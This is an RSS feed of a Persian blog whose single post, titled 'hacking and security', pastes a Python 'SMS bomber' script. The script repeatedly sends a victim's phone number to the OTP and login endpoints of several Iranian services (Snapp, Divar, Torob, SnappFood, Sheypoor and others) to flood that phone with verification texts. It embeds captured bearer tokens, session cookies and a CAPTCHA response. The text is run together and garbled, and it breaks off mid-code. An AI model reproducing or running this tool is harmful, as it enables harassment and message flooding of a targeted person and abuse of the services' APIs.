<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
    <channel>
        <title>نوشته های Hoten Musavi</title>
        <link>https://virgool.io/feed/@mok47363</link>
        <description>سلام بچه ها حالتون چطوره هوتن موسوی هستم</description>
        <language>fa</language>
        <pubDate>2026-07-07 14:27:32</pubDate>
        <image>
            <url>https://files.virgool.io/upload/users/1969665/avatar/r6TB8R.jpg?height=120&amp;width=120</url>
            <title>Hoten Musavi</title>
            <link>https://virgool.io/@mok47363</link>
        </image>

                    <item>
                <title>هک و امینت</title>
                <link>https://virgool.io/@mok47363/%D9%87%DA%A9-%D9%88-%D8%A7%D9%85%DB%8C%D9%86%D8%AA-kyhucgj6iacy</link>
                <description>های بچه ها import ایمپورت چیسیت :یک حروفی در پایتون هست که باعث میشه کتاب خانه هارو در سورس دانلود می‌کنه مثلن بمبر پایتون کداش پاینهimport random from platform import node, system, release; Node, System, Release = node(), system&#40;&#41;, release()import random واهم کد from platform import node, system, release; Node, System, Release = node(), system&#40;&#41;, release() latform import node, system, release; Node, System, Release = node(), system&#40;&#41;, release() from os import system, name; system&#40;&#x27;clear&#x27; if name == &#x27;posix&#x27; else &#x27;cls&#x27;&#41;from re import match, subfrom threading import Thread, active_countimport urllib3; urllib3.disable_warnings()from time import sleepimport pyfigletGDO = pyfiglet.figlet_format(&#x27;THOMAS&#x27;)try:    from requests import get, postexcept ImportError:    system&#40;&quot;python3 -m pip install requests&quot;&#41;   def snap(phone):    snapH = {&quot;Host&quot;: &quot;app.snapp.taxi&quot;, &quot;content-length&quot;: &quot;29&quot;, &quot;x-app-name&quot;: &quot;passenger-pwa&quot;, &quot;x-app-version&quot;: &quot;5.0.0&quot;, &quot;app-version&quot;: &quot;pwa&quot;, &quot;user-agent&quot;: &quot;Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36&quot;, &quot;content-type&quot;: &quot;application/json&quot;, &quot;accept&quot;: &quot;*/*&quot;, &quot;origin&quot;: &quot;https://app.snapp.taxi&quot;, &quot;sec-fetch-site&quot;: &quot;same-origin&quot;, &quot;sec-fetch-mode&quot;: &quot;cors&quot;, &quot;sec-fetch-dest&quot;: &quot;empty&quot;, &quot;referer&quot;: &quot;https://app.snapp.taxi/login/?redirect_to\u003d%2F&quot;, &quot;accept-encoding&quot;: &quot;gzip, deflate, br&quot;, &quot;accept-language&quot;: &quot;fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6&quot;, &quot;cookie&quot;: &quot;_gat\u003d1&quot;}    snapD = {&quot;cellphone&quot;:phone}    try:        snapR = post(timeout=5, url=&quot;https://app.snapp.taxi/api/api-passenger-oauth/v2/otp&quot;, headers=snapH, json=snapD).text        if &quot;OK&quot; in snapR:            print(f&#x27;{g}(Snap) {w}Code Was Sent&#x27;)            return True    except:        passdef gap(phone):    gapH = {&quot;Host&quot;: &quot;core.gap.im&quot;,&quot;accept&quot;: &quot;application/json, text/plain, */*&quot;,&quot;x-version&quot;: &quot;4.5.7&quot;,&quot;accept-language&quot;: &quot;fa&quot;,&quot;user-agent&quot;: &quot;Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36&quot;,&quot;appversion&quot;: &quot;web&quot;,&quot;origin&quot;: &quot;https://web.gap.im&quot;,&quot;sec-fetch-site&quot;: &quot;same-site&quot;,&quot;sec-fetch-mode&quot;: &quot;cors&quot;,&quot;sec-fetch-dest&quot;: &quot;empty&quot;,&quot;referer&quot;: &quot;https://web.gap.im/&quot;,&quot;accept-encoding&quot;: &quot;gzip, deflate, br&quot;}    try:        gapR = get(timeout=5, url=&quot;https://core.gap.im/v1/user/add.json?mobile=%2B{}&quot;.format(phone.split(&quot;+&quot;)[1]), headers=gapH).text        if &quot;OK&quot; in gapR:            print(f&#x27;{g}(Gap) {w}Code Was Sent&#x27;)            return True    except:        passdef tap30(phone):    tap30H = {&quot;Host&quot;: &quot;tap33.me&quot;,&quot;Connection&quot;: &quot;keep-alive&quot;,&quot;Content-Length&quot;: &quot;63&quot;,&quot;User-Agent&quot;: &quot;Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36&quot;,&quot;content-type&quot;: &quot;application/json&quot;,&quot;Accept&quot;: &quot;*/*&quot;,&quot;Origin&quot;: &quot;https://app.tapsi.cab&quot;,&quot;Sec-Fetch-Site&quot;: &quot;cross-site&quot;,&quot;Sec-Fetch-Mode&quot;: &quot;cors&quot;,&quot;Sec-Fetch-Dest&quot;: &quot;empty&quot;,&quot;Referer&quot;: &quot;https://app.tapsi.cab/&quot;,&quot;Accept-Encoding&quot;: &quot;gzip, deflate, br&quot;,&quot;Accept-Language&quot;: &quot;fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6&quot;}    tap30D = {&quot;credential&quot;:{&quot;phoneNumber&quot;:&quot;0&quot;+phone.split(&quot;+98&quot;)[1],&quot;role&quot;:&quot;PASSENGER&quot;}}    try:        tap30R = post(timeout=5, url=&quot;https://tap33.me/api/v2/user&quot;, headers=tap30H, json=tap30D).json()        if tap30R[&#x27;result&#x27;] == &quot;OK&quot;:            print(f&#x27;{g}(Tap30) {w}Code Was Sent&#x27;)            return True    except:        pass def divar(phone):    #divar api    divarH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;content-type&#x27;: &#x27;application/x-www-form-urlencoded&#x27;,&#x27;origin&#x27;: &#x27;https://divar.ir&#x27;,&#x27;referer&#x27;: &#x27;https://divar.ir/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;,&#x27;x-standard-divar-error&#x27;: &#x27;true&#x27;}    divarD = {&quot;phone&quot;:phone.split(&quot;+98&quot;)[1]}    try:        divarR = post(timeout=5, url=&quot;https://api.divar.ir/v5/auth/authenticate&quot;, headers=divarH, json=divarD).json()        if divarR[&quot;authenticate_response&quot;] == &quot;AUTHENTICATION_VERIFICATION_CODE_SENT&quot;:            print(f&#x27;{g}(Divar) {w}Code Was Sent&#x27;)            return True    except:        pass def torob(phone):    phone = &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1]    torobH = {&#x27;accept&#x27;: &#x27;*/*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;cookie&#x27;: &#x27;abtest=next_pwa; search_session=ofwjiyqqethomevqrgzxvopjtgkgimdc; _gcl_au=1.1.805505755.1639260830; _gid=GA1.2.683761449.1639260830; _gat_UA-105982196-1=1; _ga_CF4KGKM3PG=GS1.1.1639260830.1.0.1639260830.0; _clck=130ifw1|1|ex6|0; _ga=GA1.2.30224238.1639260830&#x27;,&#x27;origin&#x27;: &#x27;https://torob.com&#x27;,&#x27;referer&#x27;: &#x27;https://torob.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;}    try:        torobR = get(timeout=5, url=f&quot;https://api.torob.com/a/phone/send-pin/?phone_number={phone}&quot;, headers=torobH).json()        if torobR[&quot;message&quot;] == &quot;pin code sent&quot;:            print(f&#x27;{g}(Torob) {w}Code Was Sent&#x27;)            return True    except:        pass def snapfood(phone):    sfoodU = &#x27;https://snappfood.ir/mobile/v2/user/loginMobileWithNoPass?lat=35.774&amp;long=51.418&amp;optionalClient=WEBSITE&amp;client=WEBSITE&amp;deviceType=WEBSITE&amp;appVersion=8.1.0&amp;UDID=39c62f64-3d2d-4954-9033-816098559ae4&amp;locale=fa&#x27;    sfoodH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;authorization&#x27;: &#x27;Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImp0aSI6IjYxZTA5NjE5ZjVmZTNkNmRlOTMwYTQwY2I5NzdlMTBhYWY2Y2MxYWIzYTNhNjYxM2U2YWFmZGNkMzhhOTY0Mzg1NjZkMzIyMGQ3NDU4MTc2In0.eyJhdWQiOiJzbmFwcGZvb2RfcHdhIiwianRpIjoiNjFlMDk2MTlmNWZlM2Q2ZGU5MzBhNDBjYjk3N2UxMGFhZjZjYzFhYjNhM2E2NjEzZTZhYWZkY2QzOGE5NjQzODU2NmQzMjIwZDc0NTgxNzYiLCJpYXQiOjE2MzkzMTQ4NjMsIm5iZiI6MTYzOTMxNDg2MywiZXhwIjoxNjQxOTkzMzgzLCJzdWIiOiIiLCJzY29wZXMiOlsibW9iaWxlX3YyIiwibW9iaWxlX3YxIiwid2VidmlldyJdfQ.aRR7PRnrh-hfQEhkG2YnN_AJL3AjGsI2LmWwRufsvnD6enxPGJQXyZFn9MoH3OSBPmgXFMoHmCnbXvxoDA5jeRdmUvy4swLbKZf7mfv2Zg4CEQusIGgBHeqMmI31H2PIhCLPtShg0trGgzs-BUCArzMM6TV7s1P6GKMhSyXXVzxj8duJxdiNTVx5IeO8GAo8hpt6pojbp3q07xhECgK-8-3n8qevV9CRBtIwhkhqrcubgrQk6ot64ksiosVhHhvI-xVm1AW8hArI62VcEv-13AH92e9n30auYYKC961wRU6_FUFzauHqSXlhWBgZo6-uO9gwrLA7g0_91G8Eu98V4cKsVWZaRLRP1-tQE9otJduaSvEF4e88FdgW3A045Bd0I2F5Uri2WEemVyMV8CVT8Kdio6iBwGl8dLQS7SJhK7OYwTp_S7AZ9A4wJJbTuw-rU4_ykM2PlR5tNXwTNpcEdiLdglFsv9c0NOyClMIsAU7t7NcYcxdQ5twSDWPUmKK-k0xZMdeACUclkYYFNPqGSccGX0jpioyET0sMFrHQyeOvHxGPLfMeoTaXUA8LMognQ3oCWCsZHrcaQSJJ7H9WUIf4SYUvRwp-RE4JUxpOXvxgPjk0b1VUYF0dHjf1C-uQ3D7aYEAuzSW0JWyEFhurNpBaeQQhf35HH-SchuWCjafAr8rU0BCNkQJd4aresr7moHos1a_KoeQ2Y1HloPzsjOzRSpK97vApN0naRwK8k9RsoN65URZDbEzTc1b2dpTUR-VJw7lU0v5jT_PvZs7GUnpnv23UrYQIfMKISF9suy6ufb26DdIAr2pLOQ9NKqxb4QwDadFa1gPIpb_QU-8hL6N9533YTvTE8xJJjjwE6IQutNsZ1OdBdrj4APjNczDpb3PFaXtI0CbOKHYIUDsdyEIdF1o9RYrKYj-EP61SA0gzks-qYGJR1jnfQRkwkqoolu2lvDK0PxDXnM4Crd4kJRxVtrsD0P8P-jEvW6PYAmxXPtnsu5zxSMnllNNeOOAijcxG6IyPW-smsHV-6BAdk5w3FXAPe0ZcuDXb0gZseq2-GnqxmNDmRWyHc9TuGhAhWdxaP-aNm6MmoSVJ-G6fLsjXY3KLaRnIhmNfABxqcx0f03g6sBIh_1Rw965_WydlsMVU_K5-AIfsXPSxSmVnIPrN4VasUnp3XbJmnO9lm_rrpdNAM3VK20UPLCpxI7Ymxdl9wboAg8cdPlyBxIcClwtui0RC1FGZ-GpvVzWZDq_Mu6UEbU3bfi9Brr5CJ-0aa8McOK8TJBHCqfLHYOOqAruaLHhNR0fjw-bIzHLKtxGhwkkGp7n_28HtbiZVKqr48rBfbhzanCpSPYGDV4PM1_zrJDUJn4sRitw_Z78Lju3ssjuMae8zAEdHUCHGui_tYMABlPVaZhsB4s-KahT4aTOhzd7ejjoLE9WQUSuQBmMTGFZM0xH0Phyz1vSl7_5IpTHcCwTXUx3s8UvRB-Q3QQBa5O82gtZWTd56R7u0YrCJKVEnsf9a9lZz9Of6R4YdPhwByMvHFfbRLgNkuGzv75dZZf24KmbPTZN4sVCZgxD7oO0sTgh2hEYMSmdHnXvCySXZk_1G52yP8S7IwnEXRq_Hu1aje2dz0FRWYFR8nnmFuRyYSfj1rSy1Vut4ktNUsstlAYn8QmsvNqyn402aikpuG6s0ApOGMuLChv_BDd_tbsLu11-qLv3r5Exza9XJMq4aOFegpPJ5vH75entTpxPa16gmJ80lhlvKux0vnZI-mEDZ8zEI5uXi26zv4taUqLNw5nXQZbi8sxh90nYF1fNAQ-ERHQmoUeqAwL9AuZobvR7pRMmmjZMPeeDPPFrNDyCHYFO_Iu5kClQM_7jzmsLkOvCD68DkwhwftkNvTiA-dDqkkNpY8OB0GI4ynhrAqHN4Y378qbks7q4ifUU1NsSI5xdkHC4fseKMJTnnCYdyfhH14_X46zuAvSIL7DX262VTb6dAIN5KoHkjacc77Z4V7HsncWBysaXqK5yUIkL3JB5AiZlp8nV0_hCjNfA3QsfGQVoMYYeoTIutKF9Hr9r1efOXmTU0URZ-C6LYgzcntKlryroLwVg5jP3s2jQyCTIvs4CitUAyJEC3VyeW_VlSA02uMqxB-pjkipGEKe3KO1diCU7afe0xkd5C4K1NG-kLAbRAhCCtLRVJVSP0a_t84F737B9lub6bs5QcCvxARlfogXerUg9MjMU9qCWLzN9x2MukbsijxzmsGFcw-OBecMETDwoyB_0HrxP95QCwxw_X4rcW60HL45xbv9iC-gsn1qd-FKzO-XSYU0VWprr_z12bl9QOnpMc6OYf74IeJ27zl1nWR_gLo-Wg-WeFDyWcpNjmiHZkHYiDa1c3RgFv2t4ezYP0tsQEzLy-Yx0yB7WI5Z2kd_cSuaX73U9PW7rOCGnCD9cfyxZ27VyiHx8YMKKch6lyNmwPGfMhYqgMMo4NLmKy44taXRKPV20DhIsuNdMPcPUofrrrTsKarxurCX8EwRev4Ox-GcP-ocFtjKq_jkGRnqh4QQrJJh3Unpxm3sHcWhIWkNIcyChdjwnHPqKLb49UbVyJKxkt26E-cuO7_oC7PbMe8YjKFrmr2_igqr9i-YioVy1MdI5TL9sZhS8bMwG2rMozBYqWT9czRIKwabP9dUKpEn-d1nLbdrEeSzXOLYtXutiO57lGpxTDgf3ELp1zIEvTW7SEJBQ&#x27;,&#x27;content-type&#x27;: &#x27;application/x-www-form-urlencoded&#x27;,&#x27;cookie&#x27;: &#x27;UUID=39c62f64-3d2d-4954-9033-816098559ae4; location={&quot;id&quot;:&quot;&quot;,&quot;latitude&quot;:&quot;-1.000&quot;,&quot;longitude&quot;:&quot;-1.000&quot;,&quot;mode&quot;:&quot;Auto&quot;}; rl_user_id=RudderEncrypt%3AU2FsdGVkX1%2BRQfjyp1DGE7w6o2UXNZHyc7XXXwZB6%2B4%3D; rl_anonymous_id=RudderEncrypt%3AU2FsdGVkX1%2FKNDbZLoR2s9fxetSEbovoXrW2OyagTvcRyyfS%2BiAq3Wo0gtPlB2mt5jezOT0RcCuwOIS0v8tUKw%3D%3D; rl_group_id=RudderEncrypt%3AU2FsdGVkX1%2Bxvj2aS9mFuxvX6rDEMIsAuRecCyMypTk%3D; rl_trait=RudderEncrypt%3AU2FsdGVkX1%2B8so%2F5rMdojUEEuG%2BVwFrtXzXNtpojE10%3D; rl_group_trait=RudderEncrypt%3AU2FsdGVkX1%2FUIoTuPIMvAKRiGcEmnsfog8TvprQ8QJI%3D; rl_page_init_referrer=RudderEncrypt%3AU2FsdGVkX1%2FOaB1OTIgZSuGfv6Ov271AcX0ZKQWg94ey1fyJ%2Fv%2B2H09dia3Z%2BMvi; rl_page_init_referring_domain=RudderEncrypt%3AU2FsdGVkX19W4bPJRR7lbNo2fIWRB3Gk2GDkBYASrB7u755JxTnymjQ4j%2BjxgRx0; jwt-refresh_token=undefined; jwt-token_type=Bearer; jwt-expires_in=2678399; jwt-access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImp0aSI6IjYxZTA5NjE5ZjVmZTNkNmRlOTMwYTQwY2I5NzdlMTBhYWY2Y2MxYWIzYTNhNjYxM2U2YWFmZGNkMzhhOTY0Mzg1NjZkMzIyMGQ3NDU4MTc2In0.eyJhdWQiOiJzbmFwcGZvb2RfcHdhIiwianRpIjoiNjFlMDk2MTlmNWZlM2Q2ZGU5MzBhNDBjYjk3N2UxMGFhZjZjYzFhYjNhM2E2NjEzZTZhYWZkY2QzOGE5NjQzODU2NmQzMjIwZDc0NTgxNzYiLCJpYXQiOjE2MzkzMTQ4NjMsIm5iZiI6MTYzOTMxNDg2MywiZXhwIjoxNjQxOTkzMzgzLCJzdWIiOiIiLCJzY29wZXMiOlsibW9iaWxlX3YyIiwibW9iaWxlX3YxIiwid2VidmlldyJdfQ.aRR7PRnrh-hfQEhkG2YnN_AJL3AjGsI2LmWwRufsvnD6enxPGJQXyZFn9MoH3OSBPmgXFMoHmCnbXvxoDA5jeRdmUvy4swLbKZf7mfv2Zg4CEQusIGgBHeqMmI31H2PIhCLPtShg0trGgzs-BUCArzMM6TV7s1P6GKMhSyXXVzxj8duJxdiNTVx5IeO8GAo8hpt6pojbp3q07xhECgK-8-3n8qevV9CRBtIwhkhqrcubgrQk6ot64ksiosVhHhvI-xVm1AW8hArI62VcEv-13AH92e9n30auYYKC961wRU6_FUFzauHqSXlhWBgZo6-uO9gwrLA7g0_91G8Eu98V4cKsVWZaRLRP1-tQE9otJduaSvEF4e88FdgW3A045Bd0I2F5Uri2WEemVyMV8CVT8Kdio6iBwGl8dLQS7SJhK7OYwTp_S7AZ9A4wJJbTuw-rU4_ykM2PlR5tNXwTNpcEdiLdglFsv9c0NOyClMIsAU7t7NcYcxdQ5twSDWPUmKK-k0xZMdeACUclkYYFNPqGSccGX0jpioyET0sMFrHQyeOvHxGPLfMeoTaXUA8LMognQ3oCWCsZHrcaQSJJ7H9WUIf4SYUvRwp-RE4JUxpOXvxgPjk0b1VUYF0dHjf1C-uQ3D7aYEAuzSW0JWyEFhurNpBaeQQhf35HH-SchuWCjafAr8rU0BCNkQJd4aresr7moHos1a_KoeQ2Y1HloPzsjOzRSpK97vApN0naRwK8k9RsoN65URZDbEzTc1b2dpTUR-VJw7lU0v5jT_PvZs7GUnpnv23UrYQIfMKISF9suy6ufb26DdIAr2pLOQ9NKqxb4QwDadFa1gPIpb_QU-8hL6N9533YTvTE8xJJjjwE6IQutNsZ1OdBdrj4APjNczDpb3PFaXtI0CbOKHYIUDsdyEIdF1o9RYrKYj-EP61SA0gzks-qYGJR1jnfQRkwkqoolu2lvDK0PxDXnM4Crd4kJRxVtrsD0P8P-jEvW6PYAmxXPtnsu5zxSMnllNNeOOAijcxG6IyPW-smsHV-6BAdk5w3FXAPe0ZcuDXb0gZseq2-GnqxmNDmRWyHc9TuGhAhWdxaP-aNm6MmoSVJ-G6fLsjXY3KLaRnIhmNfABxqcx0f03g6sBIh_1Rw965_WydlsMVU_K5-AIfsXPSxSmVnIPrN4VasUnp3XbJmnO9lm_rrpdNAM3VK20UPLCpxI7Ymxdl9wboAg8cdPlyBxIcClwtui0RC1FGZ-GpvVzWZDq_Mu6UEbU3bfi9Brr5CJ-0aa8McOK8TJBHCqfLHYOOqAruaLHhNR0fjw-bIzHLKtxGhwkkGp7n_28HtbiZVKqr48rBfbhzanCpSPYGDV4PM1_zrJDUJn4sRitw_Z78Lju3ssjuMae8zAEdHUCHGui_tYMABlPVaZhsB4s-KahT4aTOhzd7ejjoLE9WQUSuQBmMTGFZM0xH0Phyz1vSl7_5IpTHcCwTXUx3s8UvRB-Q3QQBa5O82gtZWTd56R7u0YrCJKVEnsf9a9lZz9Of6R4YdPhwByMvHFfbRLgNkuGzv75dZZf24KmbPTZN4sVCZgxD7oO0sTgh2hEYMSmdHnXvCySXZk_1G52yP8S7IwnEXRq_Hu1aje2dz0FRWYFR8nnmFuRyYSfj1rSy1Vut4ktNUsstlAYn8QmsvNqyn402aikpuG6s0ApOGMuLChv_BDd_tbsLu11-qLv3r5Exza9XJMq4aOFegpPJ5vH75entTpxPa16gmJ80lhlvKux0vnZI-mEDZ8zEI5uXi26zv4taUqLNw5nXQZbi8sxh90nYF1fNAQ-ERHQmoUeqAwL9AuZobvR7pRMmmjZMPeeDPPFrNDyCHYFO_Iu5kClQM_7jzmsLkOvCD68DkwhwftkNvTiA-dDqkkNpY8OB0GI4ynhrAqHN4Y378qbks7q4ifUU1NsSI5xdkHC4fseKMJTnnCYdyfhH14_X46zuAvSIL7DX262VTb6dAIN5KoHkjacc77Z4V7HsncWBysaXqK5yUIkL3JB5AiZlp8nV0_hCjNfA3QsfGQVoMYYeoTIutKF9Hr9r1efOXmTU0URZ-C6LYgzcntKlryroLwVg5jP3s2jQyCTIvs4CitUAyJEC3VyeW_VlSA02uMqxB-pjkipGEKe3KO1diCU7afe0xkd5C4K1NG-kLAbRAhCCtLRVJVSP0a_t84F737B9lub6bs5QcCvxARlfogXerUg9MjMU9qCWLzN9x2MukbsijxzmsGFcw-OBecMETDwoyB_0HrxP95QCwxw_X4rcW60HL45xbv9iC-gsn1qd-FKzO-XSYU0VWprr_z12bl9QOnpMc6OYf74IeJ27zl1nWR_gLo-Wg-WeFDyWcpNjmiHZkHYiDa1c3RgFv2t4ezYP0tsQEzLy-Yx0yB7WI5Z2kd_cSuaX73U9PW7rOCGnCD9cfyxZ27VyiHx8YMKKch6lyNmwPGfMhYqgMMo4NLmKy44taXRKPV20DhIsuNdMPcPUofrrrTsKarxurCX8EwRev4Ox-GcP-ocFtjKq_jkGRnqh4QQrJJh3Unpxm3sHcWhIWkNIcyChdjwnHPqKLb49UbVyJKxkt26E-cuO7_oC7PbMe8YjKFrmr2_igqr9i-YioVy1MdI5TL9sZhS8bMwG2rMozBYqWT9czRIKwabP9dUKpEn-d1nLbdrEeSzXOLYtXutiO57lGpxTDgf3ELp1zIEvTW7SEJBQ; crisp-client%2Fsession%2F4df7eed4-f44a-4e3d-a5cc-98ec87b592bc=session_69ff5918-b549-4c78-89fd-b851ca35bdf6; crisp-client%2Fsocket%2F4df7eed4-f44a-4e3d-a5cc-98ec87b592bc=0&#x27;,&#x27;origin&#x27;: &#x27;https://snappfood.ir&#x27;,&#x27;referer&#x27;: &#x27;https://snappfood.ir/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 OPR/82.0.4227.23&#x27;}    sfoodD = {&quot;cellphone&quot;: &quot;0&quot;+phone.split(&quot;+98&quot;)[1]}    try:        sfoodR = post(timeout=5, url=sfoodU, headers=sfoodH, data=sfoodD).json()        if sfoodR[&#x27;status&#x27;] == True:            print(f&#x27;{g}(SnapFood) {w}Code Was Sent&#x27;)            return True    except:        pass def sheypoor(phone):    sheyporH = {&quot;Host&quot;: &quot;www.sheypoor.com&quot;,&quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&quot;,&quot;Accept&quot;: &quot;*/*&quot;,&quot;Accept-Language&quot;: &quot;en-US,en;q=0.5&quot;,&quot;Accept-Encoding&quot;: &quot;gzip, deflate, br&quot;,&quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded; charset=UTF-8&quot;,&quot;X-Requested-With&quot;: &quot;XMLHttpRequest&quot;,&quot;Content-Length&quot;: &quot;62&quot;,&quot;Origin&quot;: &quot;https://www.sheypoor.com&quot;,&quot;Connection&quot;: &quot;keep-alive&quot;,&quot;Referer&quot;: &quot;https://www.sheypoor.com/session&quot;,&quot;Cookie&quot;: &quot;plog=False; _lba=false; AMP_TOKEN=%24NOT_FOUND; ts=46f5e500c49277a72f267de92dd51238; track_id=22f97cea33f34e368e4b3edd23afd391; analytics_campaign={%22source%22:%22google%22%2C%22medium%22:%22organic%22}; analytics_session_token=3f475c6e-f55b-0d29-de67-6cdc46bc6592; analytics_token=3cce634d-040a-baf3-fdd6-552578d672df; yektanet_session_last_activity=8/13/2020; _yngt=0bc37b56-6478-488b-c801-521f101259fd; _lbsa=false; _ga=GA1.2.1464689488.1597346921; _gid=GA1.2.1551213293.1597346921; _gat=1&quot;,&quot;TE&quot;: &quot;Trailers&quot;}    sheyporD = {&quot;username&quot; : &quot;0&quot;+phone.split(&quot;+98&quot;)[1]}    try:        sheyporR = post(timeout=5, url=&#x27;https://www.sheypoor.com/auth&#x27;, headers=sheyporH, data=sheyporD).json()        if sheyporR[&#x27;success&#x27;] == True:            print(f&#x27;{g}(Sheypoor) {w}Code Was Sent&#x27;)            return True    except:        passdef okorosh(phone):    okJ = {    &quot;mobile&quot;: &quot;0&quot;+phone.split(&quot;+98&quot;)[1],    &quot;g-recaptcha-response&quot;: &quot;03AGdBq255m4Cy9SQ1L5cgT6yD52wZzKacalaZZw41D-jlJzSKsEZEuJdb4ujcJKMjPveDKpAcMk4kB0OULT5b3v7oO_Zp8Rb9olC5lZH0Q0BVaxWWJEPfV8Rf70L58JTSyfMTcocYrkdIA7sAIo7TVTRrH5QFWwUiwoipMc_AtfN-IcEHcWRJ2Yl4rT4hnf6ZI8QRBG8K3JKC5oOPXfDF-vv4Ah6KsNPXF3eMOQp3vM0SfMNrBgRbtdjQYCGpKbNU7P7uC7nxpmm0wFivabZwwqC1VcpH-IYz_vIPcioK2vqzHPTs7t1HmW_bkGpkZANsKeDKnKJd8dpVCUB1-UZfKJVxc48GYeGPrhkHGJWEwsUW0FbKJBjLO0BdMJXHhDJHg3NGgVHlnOuQV_wRNMbUB9V5_s6GM_zNDFBPgD5ErCXkrE40WrMsl1R6oWslOIxcSWzXruchmKfe&quot;}    okU = &#x27;https://my.okcs.com/api/check-mobile&#x27;    okH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;content-type&#x27;: &#x27;application/json;charset=UTF-8&#x27;,&#x27;cookie&#x27;: &#x27;_ga=GA1.2.1201761975.1639324247; XSRF-TOKEN=eyJpdiI6IllzYkQvdHJ5NVp3M1JyZmYweWFDTGc9PSIsInZhbHVlIjoiZ0wxQUZjR2ZzNEpPenFUZUNBZC95c2RFaEt4Y2x4VWJ2QlBmQ1ZIbUJHV2VEOGt0VG1XMXBaOVpJUFBkK2NOZmNvckxibDQ5cDkxc2ZJRkhJQUY4RlBicU80czIvZWhWZm1OSnJZMXZEbXE4TnlVeGZUSDhSYU9PRzZ6QzZGMkYiLCJtYWMiOiI2NWZlOTkxMTBjZDA5NzkyNDgwMjk2NGEwMDQzMGVhM2U1ODEzNmQ1YjExY2Q1ODc5MDFmZDBhMmZjMjQwY2JjIn0%3D; myokcs_session=eyJpdiI6InlYaXBiTUw1dHFKM05rN0psNjlwWXc9PSIsInZhbHVlIjoiNDg1QWJQcGwvT3NUOS9JU1dSZGk2K2JkVlNVV2wrQWxvWGVEc0d1MDR1aTNqVSs4Z0llSDliMW04ZFpGTFBUOG82NEJNMVFmTmNhcFpzQmJVTkpQZzVaUEtkSnFFSHU0RFprcXhWZlY0Zit2UHpoaVhLNXdmdUZYN1RwTnVLUFoiLCJtYWMiOiI5NTUwMmI2NDhkNWJjNDgwOGNmZjQxYTI4YjA0OTFjNTQ5NDc0YWJiOWIwZmI4MTViMWM0NDA4OGY5NGNhOGIzIn0%3D&#x27;,&#x27;origin&#x27;: &#x27;https://my.okcs.com&#x27;,&#x27;referer&#x27;: &#x27;https://my.okcs.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 OPR/82.0.4227.33&#x27;,&#x27;x-requested-with&#x27;: &#x27;XMLHttpRequest&#x27;,&#x27;x-xsrf-token&#x27;: &#x27;eyJpdiI6IllzYkQvdHJ5NVp3M1JyZmYweWFDTGc9PSIsInZhbHVlIjoiZ0wxQUZjR2ZzNEpPenFUZUNBZC95c2RFaEt4Y2x4VWJ2QlBmQ1ZIbUJHV2VEOGt0VG1XMXBaOVpJUFBkK2NOZmNvckxibDQ5cDkxc2ZJRkhJQUY4RlBicU80czIvZWhWZm1OSnJZMXZEbXE4TnlVeGZUSDhSYU9PRzZ6QzZGMkYiLCJtYWMiOiI2NWZlOTkxMTBjZDA5NzkyNDgwMjk2NGEwMDQzMGVhM2U1ODEzNmQ1YjExY2Q1ODc5MDFmZDBhMmZjMjQwY2JjIn0=&#x27;}    try:        okR = post(timeout=5, url=okU, headers=okH, json=okJ).text        if &#x27;success&#x27; in okR:            print(f&#x27;{g}(OfoghKourosh) {w}Code Was Sent&#x27;)            return True    except:        pass def alibaba(phone):    alibabaH = {&quot;Host&quot;: &quot;ws.alibaba.ir&quot;,&quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&quot;,&quot;Accept&quot;: &quot;application/json, text/plain, */*&quot;,&quot;Accept-Language&quot;: &quot;en-US,en;q=0.5&quot;,&quot;Accept-Encoding&quot;: &quot;gzip, deflate, br&quot;,&quot;ab-channel&quot;: &quot;WEB,PRODUCTION,CSR,WWW.ALIBABA.IR&quot;,&quot;ab-alohomora&quot;: &quot;MTMxOTIzNTI1MjU2NS4yNTEy&quot;,&quot;Content-Type&quot;: &quot;application/json;charset=utf-8&quot;,&quot;Content-Length&quot;: 